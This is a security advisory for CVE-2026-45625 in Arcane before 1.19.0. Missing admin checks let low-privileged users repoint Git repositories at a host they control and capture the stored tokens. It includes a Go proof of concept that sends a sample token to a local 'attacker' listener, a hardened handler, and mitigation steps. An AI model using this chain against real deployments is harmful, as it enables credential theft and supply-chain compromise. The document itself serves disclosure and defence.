PT-2026-41692 · Arcane · Arcane

Published 2026-05-18 · Updated 2026-05-31

CVE-2026-45625

CVSS v3.1 9.9 Critical

Vector AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions Arcane versions prior to 1.19.0
Description Arcane exposes its Git repository management endpoints to any authenticated user, so a low-privileged account can modify repository configurations, exfiltrate stored Git credentials, read private repository contents, and tamper with GitOps deployments. The root cause is that the huma-based REST API does not call the checkAdmin(ctx) helper in eight of the nine handlers under '/api/customize/git-repositories' and '/api/git-repositories/sync'. The authentication middleware only verifies that the caller is logged in; the admin role is enforced per handler, and those handlers omit the check.
An attacker holding the default user role can call UpdateRepository to change a repository's URL to a host they control while the stored (encrypted) credentials are kept as they are. Calling '/test', '/branches', or '/files' afterwards makes Arcane decrypt the legitimate Personal Access Token (PAT) or SSH key and present it to the attacker's host, as HTTP Basic auth or SSH authentication. The attacker's server terminates the connection, so the credential is recovered in cleartext regardless of transport. The same missing check allows supply-chain compromise (pointing a repository at a malicious fork that GitOps then deploys) and denial of service (deleting production repository configurations).
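The following is an added example, not Arcane's source code, that plays out the chain described above in miniature: a handler that updates a repository's URL without calling an admin check, a "test connection" step that sends the stored token to whatever host the URL now names, and an attacker-controlled server (a local httptest listener standing in for the attacker's host) that captures it. The context key, the Repository struct, the token value and the function names are all constructed for the example; Arcane's real identifiers and its huma route wiring differ. The hardened variant shows the one-line fix the advisory describes: enforcing the admin role in the handler.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
	"sync"
)

// Constructed for this example: the role is carried in the request context.
type ctxKey string

const roleKey ctxKey = "role"

var ErrForbidden = errors.New("forbidden: admin role required")

// checkAdmin stands in for the helper the advisory names. It has to be called
// from each handler, so a handler that omits the call is silently open to any
// authenticated user.
func checkAdmin(ctx context.Context) error {
	if role, _ := ctx.Value(roleKey).(string); role != "admin" {
		return ErrForbidden
	}
	return nil
}

// Repository is the stored configuration: a URL plus a secret that the
// "test connection" endpoint decrypts and presents to whatever host the URL
// currently names.
type Repository struct {
	URL   string
	Token string // stands in for the decrypted PAT
}

// VulnerableUpdate has the shape of the bug: the caller is authenticated, the
// admin role is never enforced, and the stored token survives the URL change.
func VulnerableUpdate(ctx context.Context, repo *Repository, newURL string) error {
	repo.URL = newURL
	return nil
}

// HardenedUpdate adds the missing authorization check.
func HardenedUpdate(ctx context.Context, repo *Repository, newURL string) error {
	if err := checkAdmin(ctx); err != nil {
		return err
	}
	repo.URL = newURL
	return nil
}

// TestConnection models the '/test' endpoint: it sends the stored token as
// HTTP Basic auth to repo.URL. Only transport failures are reported; the
// remote's HTTP status is irrelevant to the leak.
func TestConnection(repo *Repository) error {
	req, err := http.NewRequest(http.MethodGet, repo.URL, nil)
	if err != nil {
		return err
	}
	req.SetBasicAuth("git", repo.Token)
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return err
	}
	return resp.Body.Close()
}

// RunExfilScenario plays the attack against a given update handler: a local
// server acts as the attacker's host, a "user"-role caller re-points the
// repository at it, and the test endpoint is triggered. It returns the token
// the attacker's server received ("" if nothing leaked).
func RunExfilScenario(update func(context.Context, *Repository, string) error) (string, error) {
	var mu sync.Mutex
	captured := ""
	attacker := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if _, tok, ok := r.BasicAuth(); ok {
			mu.Lock()
			captured = tok
			mu.Unlock()
		}
		w.WriteHeader(http.StatusUnauthorized)
	}))
	defer attacker.Close()

	// Constructed sample data: a private repository with a stored PAT.
	repo := &Repository{URL: "https://git.internal.example/org/deploy.git", Token: "ghp_constructedSampleToken"}
	userCtx := context.WithValue(context.Background(), roleKey, "user")

	if err := update(userCtx, repo, attacker.URL); err != nil {
		return "", err
	}
	if err := TestConnection(repo); err != nil {
		return "", err
	}
	mu.Lock()
	defer mu.Unlock()
	return captured, nil
}

func main() {
	tok, err := RunExfilScenario(VulnerableUpdate)
	fmt.Printf("vulnerable handler: leaked=%q err=%v\n", tok, err)
	tok, err = RunExfilScenario(HardenedUpdate)
	fmt.Printf("hardened handler:   leaked=%q err=%v\n", tok, err)
}
```

Running it shows the constructed token arriving at the attacker's listener through the vulnerable handler and the hardened handler refusing the update with ErrForbidden before any URL change. Two design points follow from the shape of the bug: a per-handler check that each handler must remember to call is fragile, so the admin requirement is better attached once to the whole route group (middleware) than repeated nine times; and independently of authorization, an update that changes a repository's host should drop or require re-entry of the stored credential rather than carry it over to the new host.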
Recommendations Update to version 1.19.0 or later. As a temporary workaround, restrict access to the '/api/customize/git-repositories' and '/api/git-repositories/sync' endpoints to trusted network ranges, or disable them if they are not required. Note that network restrictions do not stop an attacker who already holds a low-privileged account inside the trusted range; until the update is applied, review configured repositories for URLs that no longer point at the expected host, and rotate any PATs or SSH keys stored in Arcane if the endpoints may have been reachable by non-admin users.

Fix

Fixed in Arcane 1.19.0.

Weakness Enumeration

Missing Authorization

Related Identifiers

CVE-2026-45625
GHSA-7H26-HG47-P9HX

Affected Products

Arcane